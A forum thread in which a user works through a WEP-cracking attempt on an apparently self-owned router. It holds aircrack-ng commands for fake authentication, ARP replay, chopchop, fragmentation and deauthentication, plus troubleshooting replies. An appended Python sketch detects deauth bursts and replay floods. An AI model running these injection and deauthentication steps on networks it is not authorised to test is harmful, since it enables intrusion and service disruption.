Cant get PRGA for WEP crack...
"airmon-ng start wlan0"
"airodump-ng mon0"
ESSID: Linksys01
BSSID: xx:xx:xx:xx:xx:xx
Channel: 6
"iwconfig wlan0 channel 6"
"iwconfig mon0 channel 6"
"airodump-ng mon0 -c 6 --bssid xx:xx:xx:xx:xx:xx"
...sniffing starts
"aireplay-ng -1 0 -e Linksys01 -a xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm"
"Sending Authentication Request
Authentication successful
Sending Association Request
Association successful :-)"
[Can see my MAC show up under stations on airodump-ng sniff]
[AUTH changes to OPN]
---------------------------------
At this point I'm confused/stuck... I perform "ls" in /root, but there is no .xor file.
I tried arpreply attack...
"aireplay-ng -3 -b xx:xx:xx:xx:xx:xx mon0"
It will continue to read packets and go nowhere.
I tried a Chop Chop...
"aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"
It will continue to read packets and go nowhere.
I tried fragmentation...
"aireplay-ng -5 -b xx:xx:xx:xx:xx:xx -h mm:mm:mm:mm:mm:mm mon0"
It will continue to read packets and go nowhere.
Tested packet injection (works). Tried keeping my MAC the same and changing it. I even tried restarting and rebooting my VMware. Same thing. I find it odd that AUTH never changes to SKA.
Any ideas?
===============================================
ROUTER: Linksys WRT54G w/DD-WRT v24 sp2
VMware Player 5.0.0 build-812388 (4 GB RAM, 2 processors, 30 GB hard drive, bridged network adapter)
BackTrack 5 R3
Alfa AWUS036H
IBM x230
Re: Cant get PRGA for WEP crack...
Yeah start using automated Wifi crackers; hackpack's airpwn, Gerix, etc. Easy, simple, fast.
Re: Cant get PRGA for WEP crack...
I don't know your ultimate goal, but here is a thread that may help a bit.
http://www.backtrack-linux.org/forum...ad.php?t=42602
Re: Cant get PRGA for WEP crack...
Thanks.
I didn't have a computer on the network. I have set up a laptop with a wireless connection, and just sent a continuous ping to the router's IP. New problem.
Arp-reply
----------
Read {packets} packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
(will continue to do this forever until I Ctrl+C)
Fragmentation
--------------
aireplay-ng -5 -b {BSSID} mon0
Finds a packet
I select "y" to use packet
"Sending fragmented packet"
"Got a deauthentication packet"
"not enough acks, repeating..."
"Trying a LLC NULL packet"
It will repeat this till "still nothing, trying another packet"
and I repeat the process.
Chop Chop
----------
aireplay-ng -4 -b {BSSID} mon0
Finds a packet
I select "y" to use packet
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
got several deauthentication packets - pausing 3 seconds for reconnection
The chopchop attack appears to have failed
Re: Cant get PRGA for WEP crack...
Taking a second look at some of the commands you've been using, I've noticed you are omitting the -w argument in airodump. This tells airodump to write all captured data to a file, which you will need to do if you want to obtain the WEP key later on. This isn't a solution to your problem - but one you will run into later.
Pinging the router IP continuously is unlikely to generate new ARPs, since the relevant details for this host are already stored in your client's ARP table. Try pinging an address that is not being used; this will cause a new ARP as the client tries to establish an IP-MAC address relationship for that host (even though it doesn't exist).
Make sure you are already sniffing and listening for ARPs - as soon as you try and ping this non-existent host, BT should detect the ARP.
Re: Cant get PRGA for WEP crack...
SOLVED:
Thank you rastamouse, I did forget to incorporate -w into my commands. Also, the problem seemed to be I wasn't performing a --deauth on the router.
"aireplay-ng -0 5 -a {BSSID} mon0"
Once I had my airodump-ng locked onto the channel, and performed a --deauth, I was able to sniff the correct packets.
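
The sequence this thread ends on, a burst of deauthentication frames followed by a flood of replayed ARP traffic, is visible to anyone monitoring the channel. The sketch below is an added example, not part of any post in the thread: it flags both patterns in frame summaries from a monitoring sensor. The record layout, MAC addresses and thresholds are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict

# Constructed addresses for the sample (not from the thread).
BSSID = "aa:aa:aa:aa:aa:aa"   # access point
BCAST = "ff:ff:ff:ff:ff:ff"   # broadcast destination
STA = "cc:cc:cc:cc:cc:cc"     # ordinary client
INJ = "bb:bb:bb:bb:bb:bb"     # station injecting replayed frames

def build_sample():
    """Constructed records: (time_s, type, src, dst, bssid, length_bytes)."""
    frames = [(0.5, "data", STA, BSSID, BSSID, 120),
              (1.2, "data", STA, BCAST, BSSID, 68)]   # one normal broadcast
    # Five broadcast deauthentication frames carrying the AP's address.
    frames += [(10.0 + 0.1 * i, "deauth", BSSID, BCAST, BSSID, 26)
               for i in range(5)]
    # 300 same-length broadcast data frames from one source within a second.
    frames += [(12.0 + i / 300, "data", INJ, BCAST, BSSID, 68)
               for i in range(300)]
    return frames

def detect(frames, window=1.0, deauth_min=5, replay_min=100):
    """Count frames per fixed time window and return alerts sorted by time.

    deauth_burst:     >= deauth_min deauth frames for one BSSID in a window.
    broadcast_replay: >= replay_min broadcast data frames with the same
                      source and length in a window (a replayed frame keeps
                      its length, so the count piles up on a single key).
    Thresholds are assumed values; tune them against normal traffic.
    """
    deauth = defaultdict(int)
    replay = defaultdict(int)
    for t, ftype, src, dst, bssid, length in frames:
        slot = int(t // window)
        if ftype == "deauth":
            deauth[(bssid, slot)] += 1
        elif ftype == "data" and dst == BCAST:
            replay[(bssid, slot, src, length)] += 1
    alerts = []
    for (bssid, slot), n in deauth.items():
        if n >= deauth_min:
            alerts.append((slot * window, "deauth_burst", bssid, n))
    for (bssid, slot, src, length), n in replay.items():
        if n >= replay_min:
            alerts.append((slot * window, "broadcast_replay", src, n))
    return sorted(alerts)

if __name__ == "__main__":
    for alert in detect(build_sample()):
        print(alert)
```
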